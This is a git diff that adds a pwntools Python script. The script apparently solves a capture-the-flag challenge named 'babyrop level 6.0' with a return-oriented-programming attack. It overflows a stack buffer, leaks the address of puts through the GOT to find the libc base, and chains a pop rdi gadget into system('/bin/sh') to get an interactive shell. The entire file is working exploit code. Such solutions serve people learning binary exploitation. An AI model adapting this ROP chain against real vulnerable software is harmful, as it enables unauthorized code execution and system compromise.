diff --git a/weiss_overlude/babyrop_level_6.0/a.py b/weiss_overlude/babyrop_level_6.0/a.py
new file mode 100644
index 0000000..eccbd77
--- /dev/null
+++ b/weiss_overlude/babyrop_level_6.0/a.py
@@ -0,0 +1,44 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+"""
+patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_6_0
+"""
+
+context.binary = target = ELF("./babyrop_level_6_0", checksec=False)
+libc = target.libc
+r = process()
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# gadgets
+pop_rdi = 0x4023cc
+
+# buf
+buf = b"A"*88
+buf += p64(pop_rdi)
+buf += p64(target.got.puts)
+buf += p64(target.sym.puts)
+buf += p64(target.sym.challenge)
+s(buf)
+
+# leak
+r.recvuntil(b"Leaving!\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc.address = puts - libc.sym.puts
+log.info("libc: %#x", libc.address)
+sh = next(libc.search(b"/bin/sh"))
+system = libc.sym.system
+
+# pop
+buf = b"A"*88
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
\ No newline at end of file